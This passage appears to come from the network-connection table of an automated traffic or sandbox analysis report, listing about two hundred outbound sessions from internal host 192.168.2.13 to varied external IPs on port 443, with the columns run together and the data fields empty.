                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20688192.168.2.1355674105.226.231.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20689192.168.2.1340688181.188.183.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20690192.168.2.1343484150.150.176.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20691192.168.2.135715620.99.125.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20692192.168.2.135816042.187.187.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20693192.168.2.1338986211.187.43.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20694192.168.2.134421650.12.68.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20695192.168.2.133963236.16.63.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20696192.168.2.1355828190.106.103.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20697192.168.2.134722243.151.62.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20698192.168.2.135969635.32.54.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20699192.168.2.1352026115.88.118.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20700192.168.2.1358026172.192.252.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20701192.168.2.135767054.69.164.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20702192.168.2.134316888.91.26.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20703192.168.2.135908840.31.66.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20704192.168.2.1353994172.101.59.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20705192.168.2.1353224171.212.137.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20706192.168.2.1347842191.169.92.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20707192.168.2.133681612.116.5.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20708192.168.2.1337238166.139.108.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20709192.168.2.1358384163.197.188.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20710192.168.2.1354522219.246.148.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20711192.168.2.1340772113.77.155.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20712192.168.2.1339260169.68.206.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20713192.168.2.133991849.36.147.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20714192.168.2.1348514217.238.64.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20715192.168.2.1359226168.96.79.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20716192.168.2.1346168126.185.194.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20717192.168.2.1335658216.92.36.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20718192.168.2.1358624206.254.239.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20719192.168.2.1339614205.2.235.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20720192.168.2.133408819.124.126.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20721192.168.2.13587709.167.29.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20722192.168.2.1352716126.102.223.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20723192.168.2.1351576167.207.222.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20724192.168.2.1348092179.149.99.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20725192.168.2.1348300223.92.174.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20726192.168.2.1342442194.185.131.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20727192.168.2.1347220217.7.203.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20728192.168.2.1360268202.177.15.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20729192.168.2.1337762122.181.100.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20730192.168.2.135251262.181.136.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20731192.168.2.1335002208.132.248.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20732192.168.2.1346686165.99.65.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20733192.168.2.1355000126.72.130.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20734192.168.2.1349018114.5.181.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20735192.168.2.1337714141.83.148.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20736192.168.2.1360102186.182.240.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20737192.168.2.1334110184.204.192.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20738192.168.2.133486494.68.211.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20739192.168.2.1337766124.192.82.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20740192.168.2.1332934198.162.24.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20741192.168.2.1337456135.175.170.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20742192.168.2.1336538204.185.126.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20743192.168.2.1349586144.104.32.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20744192.168.2.1345936213.160.253.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20745192.168.2.13577222.199.135.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20746192.168.2.1351810137.125.42.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20747192.168.2.135921898.222.248.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20748192.168.2.135956650.254.94.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20749192.168.2.134589497.28.203.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20750192.168.2.1351396159.222.173.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20751192.168.2.1350044154.209.156.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20752192.168.2.135908052.96.59.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20753192.168.2.1339978123.172.253.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20754192.168.2.1357364110.126.49.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20755192.168.2.133443093.23.101.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20756192.168.2.1338836155.248.72.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20757192.168.2.1339800210.42.100.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20758192.168.2.135181278.237.140.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20759192.168.2.1333232112.165.119.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20760192.168.2.1342954213.136.184.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20761192.168.2.135038676.211.94.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20762192.168.2.134682036.118.137.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20763192.168.2.1344474223.158.130.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20764192.168.2.133784251.67.139.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20765192.168.2.135258667.64.60.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20766192.168.2.1335152133.112.101.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20767192.168.2.1340544146.91.216.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20768192.168.2.135017812.232.105.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20769192.168.2.135151823.161.55.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20770192.168.2.133877665.108.248.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20771192.168.2.1359426186.86.141.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20772192.168.2.1358436109.19.55.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20773192.168.2.135746817.90.178.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20774192.168.2.134852692.217.193.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20775192.168.2.133711271.166.192.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20776192.168.2.1348496192.38.102.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20777192.168.2.1358058178.29.142.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20778192.168.2.1351032199.60.160.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20779192.168.2.135869053.78.133.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20780192.168.2.1355836106.139.230.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20781192.168.2.134494212.93.204.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20782192.168.2.135893277.11.246.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20783192.168.2.1338126154.227.136.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20784192.168.2.1346730209.222.101.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20785192.168.2.1348338202.172.13.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20786192.168.2.134471893.239.147.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20787192.168.2.135122844.244.233.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20788192.168.2.1356522145.203.221.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20789192.168.2.1360354162.172.152.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20790192.168.2.135106838.138.25.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20791192.168.2.1353956148.186.95.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20792192.168.2.134633046.94.178.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20793192.168.2.1354074191.41.142.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20794192.168.2.134439269.9.141.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20795192.168.2.1346240171.100.150.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20796192.168.2.1337326147.98.10.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20797192.168.2.1357694189.37.253.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20798192.168.2.135290848.234.25.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20799192.168.2.1352986132.158.48.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20800192.168.2.1351786118.165.187.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20801192.168.2.1352282193.158.40.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20802192.168.2.1334744183.208.186.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20803192.168.2.1351668192.7.210.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20804192.168.2.1356846168.69.0.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20805192.168.2.13587244.159.97.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20806192.168.2.1352594103.64.54.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20807192.168.2.1339484111.234.2.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20808192.168.2.1349106173.73.42.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20809192.168.2.134499461.120.165.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20810192.168.2.135233654.239.196.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20811192.168.2.1354458174.25.162.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20812192.168.2.1356600121.54.93.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20813192.168.2.133508089.7.98.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20814192.168.2.1360488188.100.62.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20815192.168.2.1345306103.215.144.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20816192.168.2.1345194205.81.227.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20817192.168.2.133654676.95.210.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20818192.168.2.1354018217.30.101.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20819192.168.2.134490684.0.24.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20820192.168.2.134209235.67.46.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20821192.168.2.135565487.143.197.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20822192.168.2.1351960125.119.198.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20823192.168.2.136053072.205.121.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20824192.168.2.136080260.148.131.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20825192.168.2.134471090.235.157.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20826192.168.2.133615636.222.109.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20827192.168.2.1347212209.60.162.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20828192.168.2.1337084216.229.236.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20829192.168.2.1356954213.246.113.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20830192.168.2.1342126167.189.97.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20831192.168.2.1354674117.159.49.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20832192.168.2.1342996189.75.69.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20833192.168.2.1346370120.144.217.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20834192.168.2.1345846194.19.177.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20835192.168.2.1346600160.182.255.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20836192.168.2.133349297.241.84.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20837192.168.2.1360374185.124.58.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20838192.168.2.1341434163.55.157.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20839192.168.2.136019487.216.143.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20840192.168.2.134169851.138.89.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20841192.168.2.1353946208.120.1.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20842192.168.2.1338996166.206.143.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20843192.168.2.1348452129.117.9.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20844192.168.2.1352798118.234.15.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20845192.168.2.1344372126.236.144.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20846192.168.2.134354042.145.68.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20847192.168.2.1339924187.121.84.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20848192.168.2.135986237.84.121.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20849192.168.2.1354338189.25.146.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20850192.168.2.1357898133.230.95.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20851192.168.2.133461832.226.220.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20852192.168.2.134063874.44.77.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20853192.168.2.1358048166.31.40.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20854192.168.2.134779890.206.162.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20855192.168.2.1346092220.118.101.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20856192.168.2.1359632203.46.32.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20857192.168.2.135109277.133.168.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20858192.168.2.1358040144.191.244.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20859192.168.2.134060452.146.159.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20860192.168.2.134726837.201.244.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20861192.168.2.134481618.100.19.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20862192.168.2.1335468107.62.29.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20863192.168.2.134799498.183.220.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20864192.168.2.134369895.232.46.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20865192.168.2.134911078.154.4.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20866192.168.2.1355510113.188.142.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20867192.168.2.1340594111.242.210.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20868192.168.2.1354302151.68.52.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20869192.168.2.135183440.149.251.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20870192.168.2.1356130113.26.124.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20871192.168.2.133665844.210.138.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20872192.168.2.1358752110.217.250.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20873192.168.2.1348424159.150.85.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20874192.168.2.133319018.175.17.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20875192.168.2.135095623.155.184.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20876192.168.2.1353080137.41.209.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20877192.168.2.134918413.184.150.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20878192.168.2.134454879.155.192.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20879192.168.2.1344932120.30.155.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20880192.168.2.1359872108.48.129.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20881192.168.2.134969894.176.104.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20882192.168.2.1359902138.219.190.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20883192.168.2.133657042.126.250.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20884192.168.2.1352494186.26.15.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20885192.168.2.1347514171.51.12.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20886192.168.2.1346566116.249.101.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20887192.168.2.1353040131.206.198.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20888192.168.2.1344678198.116.33.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20889192.168.2.135152414.100.108.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20890192.168.2.1357936157.104.105.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20891192.168.2.13505429.142.106.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20892192.168.2.1354396112.178.103.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20893192.168.2.135532859.245.25.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20894192.168.2.1340916122.46.195.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20895192.168.2.135980897.205.131.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20896192.168.2.1351360103.110.254.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20897192.168.2.133349869.150.143.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20898192.168.2.134116671.237.233.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20899192.168.2.135512292.83.142.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
